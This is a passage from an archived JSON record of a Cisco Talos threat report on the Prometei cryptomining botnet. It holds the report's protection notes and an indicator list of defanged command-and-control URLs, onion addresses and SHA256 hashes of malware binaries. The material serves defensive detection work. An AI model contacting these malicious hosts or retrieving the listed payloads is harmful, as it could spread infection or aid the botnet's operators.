malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase onSnort.org.\r\nIOCs\r\nOSQuery\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected\r\nwith this specific threat. For specific OSqueries on this threat, click below:\r\nPrometei botnet registry entry\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 19 of 22\n\nURLs\r\nhxxp://103[.]11[.]244[.]221/crawler[.]php\r\nhxxp://103[.]11[.]244[.]221/lR[.]php\r\nhxxp://208[.]66[.]132[.]3:8080/7z[.]dll\r\nhxxp://208[.]66[.]132[.]3:8080/7z[.]exe\r\nhxxp://208[.]66[.]132[.]3:8080/_agent[.]7z\r\nhxxp://208[.]66[.]132[.]3:8080/chk445[.]php\r\nhxxp://208[.]66[.]132[.]3:8080/Desktop[.]txt\r\nhxxp://208[.]66[.]132[.]3:8080/dllr0[.]php hxxp://208[.]66[.]132[.]3:8080/srchindx2[.]php\r\nhxxp://208[.]66[.]132[.]3:8080/zlib[.]php hxxp://208[.]66[.]132[.]3:8080/ztasklist[.]php\r\nhxxp://69[.]28[.]95[.]50:180/miwalk[.]txt\r\nhxxp://69[.]28[.]95[.]50:180/walker14364[.]php\r\nhxxp://69[.]84[.]240[.]57:180/lR[.]php\r\nhxxp://69[.]84[.]240[.]57:180/miwalk[.]txt\r\nhxxp://69[.]84[.]240[.]57:180/walker14364[.]php\r\nhxxp://bk1[.]bitspiritfun2[.]net/cgi-bin/prometei[.]cgi\r\nhxxp://p1[.]feefreepool[.]net/cgi-bin/prometei[.]cgi\r\nhxxps://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei[.]cgi\r\nhxxps://211[.]23[.]16[.]239/prometheus[.]php\r\nSHA256s\r\nSvchost.exe sha256s\r\n601a1269ca0d274e518848c35a2399115000f099df149673b9dbc3cd77928d40\r\n58d210b47abba83c54951f3c08a91d8091beae300c412316089b5506bd330adc\r\nae078c49adba413a10a38a7dcfc20359808bc2724453f6df03a517b622cbca0e\r\n9a5c109426480c7283f6f659cb863be81bd46301548d2754baf8b38e9e88828d\r\nd363dc2aafdf0d9366b5848fc780edfa6888418750e2a61148436908ea3f5433\r\n8ca679d542904a89d677cb3fd7db309364f2214f6dc5e89099081835bec4e440\r\nfe0a5d851a9dd2ba7d1b0818f59363f752fc7343bdfc306969280ade54b2f017\r\n7f78ddc27b22559df5c50fd1e5d0957369aadd1557a239aaf4643d51d54c4f94\r\n0d6ca238faf7911912b84086f7bdad3cd6a54db53677a69722de65982a43ee09\r\nc08f291510cd4eccaacff5e04f0eca55b97d15c60b72b204eae1fc0c8d652f48\r\nf6eddbabc1d6b05d2bc27077bcb55ff640c5cf8b09a18fc51ed160a851f8be58\r\n8b7b40c0f59bbe4c76521b32cc4e344033c5730ccb9de28cfba966d8c26ca3ef\r\na7ad84e8f5deb1d2e32dd84f3294404a5f7f739215bdd90d7d37d74ee8a05409\r\n76110b87e46eb61f492d680a2b34662040bb9c25c947a599536cdaf5170fe581\r\necd4c12ef01028c3f544c0f7c871c6d6f256997f1b7be4c8fdbb0f8572012444\r\nb0500636927b2ddb1e26a21fbf19a8c1fc47a260062976ddbef60fd47c21dc6e\r\nea2174993892789f0c1081152c31b3b3fef79c6a5016840ea72321229c7fe128\r\n9e86d18d5761493e11fe95d166c433331d00e4f1bf3f3b23a07b95d449987b78\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 20 of 22\n\n923201672a41f93fb43dae22f30f7d2d170c0b80e534c592e796bd8ad95654ea\r\n1df6e9705e9ffb3d2c4f1d9ca49f1e27c4bcac13dba75eac9c41c3785a8ca4b1\r\nMsdtc sha256s\r\n7c71fb85b94fb4ff06bbaf81d388d97f6e828428ee9f638525d4f6e488e71190\r\n994d20fee2bd05e67c688e101f747a5d17b0352a838af818ad357c8c7a34a766\r\nd3dc9cdb106902471ee95016440b855806e8e5dd0f313864e46126fd3ecfe4fe\r\nSorted\r\n4ec815b28fe30f61a282c1943885fa81c6e0e98413f5e7f3f89ec6810f3b62a3 - SearchIndexer.exe\r\ne0a181318eb881d481d2e4830289ed128006269ace890139f054cf050351500a - chk445.exe\r\n6935e6a303d3dff35079ae3ec78fd85b7bd4ff3ee2458b82cbfa548d7972c6d7 - crawler.exe\r\n7c71fb85b94fb4ff06bbaf81d388d97f6e828428ee9f638525d4f6e488e71190 - SearchIndexer.exe\r\na02b532cc9dc257009d7f49382746d9d0bce331a665f4a4c12ae6fc2917df745 - miwalk.exe\r\n7c71fb85b94fb4ff06bbaf81d388d97f6e828428ee9f638525d4f6e488e71190 - msdtc.exe\r\na303bc8d4011183780344329445bc6dfbb8417f534f304c956e4f86468d620d5 - nvstub.exe\r\n0970037be8f90c3b2b718858a032e77916969113823895e268c7693dddba1181 - nvsync2.exe\r\ndc2fee73b41d488a1cccd905ecc9030e66ff7c7e5dcf60fc580406c6f8090854 - nvsync4.exe\r\n382c3e80eadd7ca7b224ebe1fe656555fb15227face38fbea40ae4a9515ecb80 - ps.exe\r\n54967e106bb2acfd5b4e69fc385c1c20d5af3bdc79b629a9e3ddb3a2375f0bc1 - rdpcIip.exe\r\nb65aef379e3173ca32b83fd0c54483c2090966910fdda3145af97b5dbff85427- smcard.exe\r\n0dd1d869b3c7ce4af03ce4db6172b84d66c3779b48493d7e504de9d350195c5b - socks.exe\r\n559d65f11e9143dfb093cabc6a1430438643922035765a445276abd80c15ce4b - svchost1.exe\r\nc08f291510cd4eccaacff5e04f0eca55b97d15c60b72b204eae1fc0c8d652f48 - svchost2.exe\r\n94d066b7d2d8b95d6da525f61c19a7bbdec5afdb033dfe2712dd51d5073b1db2 - svchost64bitearlier.exe\r\nf09679bae1388033b17196f92430678e7b15816648f380bb4de3dd25009011b7 - ztasklist.exe\r\n0ed9ac4238a4b5aadcd845e4dcd786ce2ee265a6b1a50e8b9019cceb6c013de5 - tor-gencert.exe\r\nf6eddbabc1d6b05d2bc27077bcb55ff640c5cf8b09a18fc51ed160a851f8be58 - zsvc.exe\r\nOther\r\na02b532cc9dc257009d7f49382746d9d0bce331a665f4a4c12ae6fc2917df745\r\nf555431a09ae975ac0e8f138ce4eaf44cd8a3460e3bb7ba44b0101cd3a5b1157\r\n61428b3d336636bfef0e7fe1783f9b2d62182c06d3928ec4b9b7201170e24fb6\r\n89d5e5d51e9bb0cee8708adc5dd3e961410b6a55963f020a5930ed93aa68c0eb\r\n24554a4eed764023d6e5e4990729308ee80ce0f3437ab4af6ad0ebff64512516\r\n3574734ad6416ca584c4c0211156fb24107e9b983e6542199736530e4a4effcd\r\n7f7f474d054ffc638b72f8bdd34e31315a8c72846d15479f86919569fea5b5fc\r\n0c821863e8fd8e493d90004f734055f91b8f43d3b905a38dc983443146f48602\r\n236120868431f1fe3637623a8a4cbda6bbfdd71c4e55a1dff76efa0381274623\r\n02e1852066ad61bddf98943cb8e3091d6e23d75bf24340809e8212aedfd6e450\r\n50c5a74fd34ae16557e077e4116b823d049ac735e0ec31328851b385b4891523\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 21 of 22\n\n1946c56c261d86dd78f087cb6452a0cc58895c7bcb7c73a8023ee6c9d5a5c2eb\r\n57cb49a5406b0ed9c81907940fda8cd534116e19a7821ad3061b209f46675f2d\r\na1c05973ac397fe81b2e553aecc322c794dc5977928e7b56cf1c8a62f68afdf0\r\nefaa199e64bd4132a4bf783c37bbc20fefb6ea45ff60ea68f4a4214bf8ab1268\r\n54967e106bb2acfd5b4e69fc385c1c20d5af3bdc79b629a9e3ddb3a2375f0bc1\r\na122eeeac51784d54ddf159749b4e657ad821037237c07540fb2ff25a67b1210\r\neeb1a574da0836a4ac34132d96fd442d7c5827e607389ef1dfebeb419a09dae7\r\nSource: https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html"
	],
	"report_names": [
		"prometei-botnet-and-its-quest-for-monero.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434046,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.pdf",
		"text": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.txt",
		"img": "https://archive.orkl.eu/e2dd49c43c470375806d61d3a60efabcbc58f97e.jpg"
	}
}